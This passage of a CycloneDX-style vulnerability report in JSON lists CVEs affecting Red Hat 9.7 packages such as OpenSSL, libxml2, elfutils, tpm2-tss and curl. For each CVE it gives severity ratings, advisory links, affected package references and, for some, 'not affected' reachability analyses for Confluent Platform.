"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30681" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30682" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30683" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30684" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30685" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30687" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30688" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30689" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30693" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30695" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30696" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30699" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30703" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30704" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30705" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30715" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30721" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-30722" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50077" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50078" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50079" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50080" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50081" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50082" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50083" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50084" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50085" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50086" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50087" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50088" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50091" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50092" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50093" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50094" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50096" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50097" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50098" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50099" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50100" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50101" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50102" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-50104" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-5399" }, { "url": "https://errata.almalinux.org/9/ALSA-2025-16046.html" }, { "url": "https://errata.rockylinux.org/RLSA-2025:15699" }, { "url": "https://github.com/advisories/GHSA-r9fv-h47r-823f" }, { "url": "https://github.com/openssl/openssl/commit/07272b05b04836a762b4baa874958af51d513844" }, { "url": "https://github.com/openssl/openssl/commit/2af62e74fb59bc469506bc37eb2990ea408d9467" }, { "url": "https://github.com/openssl/openssl/commit/392dcb336405a0c94486aa6655057f59fd3a0902" }, { "url": "https://github.com/openssl/openssl/commit/4b1cb94a734a7d4ec363ac0a215a25c181e11f65" }, { "url": "https://github.com/openssl/openssl/commit/77c608f4c8857e63e98e66444e2e761c9627916f" }, { "url": "https://github.openssl.org/openssl/extended-releases/commit/0d5fd1ab987f7571e2c955d8d8b638fc0fb54ded" }, { "url": "https://github.openssl.org/openssl/extended-releases/commit/a2639000db19878d5d89586ae7b725080592ae86" }, { "url": "https://linux.oracle.com/cve/CVE-2024-13176.html" }, { "url": "https://linux.oracle.com/errata/ELSA-2025-16046.html" }, { "url": "https://lists.debian.org/debian-lts-announce/2025/05/msg00028.html" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-13176" }, { "url": "https://openssl-library.org/news/secadv/20250120.txt" }, { "url": "https://security.netapp.com/advisory/ntap-20250124-0005" }, { "url": "https://security.netapp.com/advisory/ntap-20250124-0005/" }, { "url": "https://security.netapp.com/advisory/ntap-20250418-0010" }, { "url": "https://security.netapp.com/advisory/ntap-20250418-0010/" }, { "url": "https://security.netapp.com/advisory/ntap-20250502-0006" }, { "url": "https://security.netapp.com/advisory/ntap-20250502-0006/" }, { "url": "https://ubuntu.com/security/notices/USN-7264-1" }, { "url": "https://ubuntu.com/security/notices/USN-7278-1" }, { "url": "https://ubuntu.com/security/notices/USN-7894-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2024-13176" }, { "url": "https://www.oracle.com/security-alerts/cpuapr2025.html#AppendixMSQL" } ], "published": "2025-01-20T14:15:26+00:00", "updated": "2026-04-15T00:35:42+00:00", "affects": [ { "ref": "pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1", "versions": [ { "version": "1:3.5.1-7.el9_7", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1", "versions": [ { "version": "1:3.5.1-7.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" } ] }, { "id": "CVE-2024-25260", "ratings": [ { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 4, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "source": { "name": "ubuntu" }, "severity": "low" } ], "cwes": [ 476 ], "description": "elfutils v0.189 was discovered to contain a NULL pointer dereference via the handle_verdef() function at readelf.c.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2024-25260" }, { "url": "https://access.redhat.com/security/cve/CVE-2024-25260" }, { "url": "https://github.com/schsiung/fuzzer_issues/issues/1" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25260" }, { "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=31058" }, { "url": "https://sourceware.org/elfutils/" }, { "url": "https://ubuntu.com/security/notices/USN-7369-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2024-25260" } ], "published": "2024-02-20T18:15:52+00:00", "updated": "2025-04-25T20:42:23+00:00", "affects": [ { "ref": "pkg:rpm/redhat/elfutils-default-yama-scope@0.193-1.el9?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "0.193-1.el9", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/elfutils-libelf@0.193-1.el9?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "0.193-1.el9", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/elfutils-libs@0.193-1.el9?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "0.193-1.el9", "status": "affected" } ] }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.193-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/elfutils-libelf@0.193-1.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/elfutils-libs@0.193-1.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.193-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/elfutils-libelf@0.193-1.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/elfutils-libs@0.193-1.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.193-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/elfutils-libelf@0.193-1.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/elfutils-libs@0.193-1.el9?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "code_not_reachable", "response": [ "update" ], "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable." } }, { "id": "CVE-2024-29040", "ratings": [ { "source": { "name": "amazon" }, "severity": "medium" }, { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "cbl-mariner" }, "severity": "medium" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 4.4, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 502 ], "description": "This repository hosts source code implementing the Trusted Computing Group's (TCG) TPM2 Software Stack (TSS). The JSON Quote Info returned by Fapi_Quote has to be deserialized by Fapi_VerifyQuote to the TPM Structure `TPMS_ATTEST`. For the field `TPM2_GENERATED magic` of this structure any number can be used in the JSON structure. The verifier can receive a state which does not represent the actual, possibly malicious state of the device under test. The malicious device might get access to data it shouldn't, or can use services it shouldn't be able to. This \nissue has been patched in version 4.1.0.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2024-29040" }, { "url": "https://access.redhat.com/security/cve/CVE-2024-29040" }, { "url": "https://github.com/tpm2-software/tpm2-tss/commit/710cd0b6adf3a063f34a8e92da46df7a107d9a99" }, { "url": "https://github.com/tpm2-software/tpm2-tss/releases/tag/4.1.0" }, { "url": "https://github.com/tpm2-software/tpm2-tss/security/advisories/GHSA-837m-jw3m-h9p6" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EFR7SVEWCOXORHPCLLGXEMHFMIGG2MFE/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GI4JFEZBKQQUPJ4RWK6IHEWXAFCEJDPI/" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29040" }, { "url": "https://ubuntu.com/security/notices/USN-6796-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2024-29040" } ], "published": "2024-06-28T21:15:02+00:00", "updated": "2026-04-15T00:35:42+00:00", "affects": [ { "ref": "pkg:rpm/redhat/tpm2-tss@3.2.3-1.el9?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.2.3-1.el9", "status": "affected" } ] }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/tpm2-tss@3.2.3-1.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/tpm2-tss@3.2.3-1.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/tpm2-tss@3.2.3-1.el9?arch=x86_64&distro=redhat-9.7" } ] }, { "id": "CVE-2024-34459", "ratings": [ { "source": { "name": "amazon" }, "severity": "medium" }, { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "cbl-mariner" }, "severity": "high" }, { "source": { "name": "photon" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 5.5, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "source": { "name": "ubuntu" }, "severity": "low" } ], "cwes": [ 122 ], "description": "An issue was discovered in xmllint (from libxml2) before 2.11.8 and 2.12.x before 2.12.7. Formatting error messages with xmllint --htmlout can result in a buffer over-read in xmlHTMLPrintFileContext in xmllint.c.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2024-34459" }, { "url": "https://access.redhat.com/security/cve/CVE-2024-34459" }, { "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/720" }, { "url": "https://gitlab.gnome.org/GNOME/libxml2/-/releases/v2.11.8" }, { "url": "https://gitlab.gnome.org/GNOME/libxml2/-/releases/v2.12.7" }, { "url": "https://lists.debian.org/debian-lts-announce/2025/07/msg00014.html" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5HVUXKYTBWT3G5DEEQX62STJQBY367NL/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/INKSSLW5VMZIXHRPZBAW4TJUX5SQKARG/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VRDJCNQP32LV56KESUQ5SNZKAJWSZZRI/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5HVUXKYTBWT3G5DEEQX62STJQBY367NL/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/INKSSLW5VMZIXHRPZBAW4TJUX5SQKARG/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VRDJCNQP32LV56KESUQ5SNZKAJWSZZRI/" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34459" }, { "url": "https://ubuntu.com/security/notices/USN-7240-1" }, { "url": "https://ubuntu.com/security/notices/USN-7302-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2024-34459" } ], "published": "2024-05-14T15:39:11+00:00", "updated": "2025-11-04T22:16:01+00:00", "affects": [ { "ref": "pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.9.13-14.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "code_not_reachable", "response": [ "update" ], "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable." } }, { "id": "CVE-2024-41996", "ratings": [ { "source": { "name": "amazon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 5.9, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "cwes": [ 295 ], "description": "Validating the order of the public keys in the Diffie-Hellman Key Agreement Protocol, when an approved safe prime is used, allows remote attackers (from the client side) to trigger unnecessarily expensive server-side DHE modular-exponentiation calculations. The client may cause asymmetric resource consumption. The basic attack scenario is that the client must claim that it can only communicate with DHE, and the server must be configured to allow DHE and validate the order of the public key.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2024-41996" }, { "url": "https://access.redhat.com/security/cve/CVE-2024-41996" }, { "url": "https://cert-portal.siemens.com/productcert/html/ssa-089022.html" }, { "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html" }, { "url": "https://cert-portal.siemens.com/productcert/html/ssa-485750.html" }, { "url": "https://dheatattack.gitlab.io/details/" }, { "url": "https://dheatattack.gitlab.io/faq/" }, { "url": "https://gist.github.com/c0r0n3r/abccc14d4d96c0442f3a77fa5ca255d1" }, { "url": "https://github.com/openssl/openssl/issues/17374" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41996" }, { "url": "https://openssl-library.org/post/2022-10-21-tls-groups-configuration/" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2024-41996" } ], "published": "2024-08-26T06:15:04+00:00", "updated": "2026-05-12T12:17:03+00:00", "affects": [ { "ref": "pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1", "versions": [ { "version": "1:3.5.1-7.el9_7", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1", "versions": [ { "version": "1:3.5.1-7.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" } ], "analysis": { "state": "not_affected", "justification": "code_not_reachable", "response": [ "update" ], "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable." } }, { "id": "CVE-2024-7264", "ratings": [ { "source": { "name": "alma" }, "severity": "high" }, { "source": { "name": "amazon" }, "severity": "high" }, { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "cbl-mariner" }, "severity": "medium" }, { "source": { "name": "nvd" }, "score": 6.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "source": { "name": "oracle-oval" }, "severity": "high" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 5.3, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:H" }, { "source": { "name": "rocky" }, "severity": "high" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 125 ], "description": "libcurl's ASN1 parser code has the `GTime2str()` function, used for parsing an\nASN.1 Generalized Time field. If given an syntactically incorrect field, the\nparser might end up using -1 for the length of the *time fraction*, leading to\na `strlen()` getting performed on a pointer to a heap buffer area that is not\n(purposely) null terminated.\n\nThis flaw most likely leads to a crash, but can also lead to heap contents\ngetting returned to the application when\n[CURLINFO_CERTINFO](https://curl.se/libcurl/c/CURLINFO_CERTINFO.html) is used.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2024-7264" }, { "url": "http://www.openwall.com/lists/oss-security/2024/07/31/1" }, { "url": "https://access.redhat.com/errata/RHSA-2025:1671" }, { "url": "https://access.redhat.com/security/cve/CVE-2024-7264" }, { "url": "https://bugzilla.redhat.com/2294581" }, { "url": "https://bugzilla.redhat.com/2294676" }, { "url": "https://bugzilla.redhat.com/2301888" }, { "url": "https://bugzilla.redhat.com/2318857" }, { "url": "https://bugzilla.redhat.com/2318858" }, { "url": "https://bugzilla.redhat.com/2318870" }, { "url": "https://bugzilla.redhat.com/2318873" }, { "url": "https://bugzilla.redhat.com/2318874" }, { "url": "https://bugzilla.redhat.com/2318876" }, { "url": "https://bugzilla.redhat.com/2318882" }, { "url": "https://bugzilla.redhat.com/2318883" }, { "url": "https://bugzilla.redhat.com/2318884" }, { "url": "https://bugzilla.redhat.com/2318885" }, { "url": "https://bugzilla.redhat.com/2318886" }, { "url": "https://bugzilla.redhat.com/2318897" }, { "url": "https://bugzilla.redhat.com/2318900" }, { "url": "https://bugzilla.redhat.com/2318905" }, { 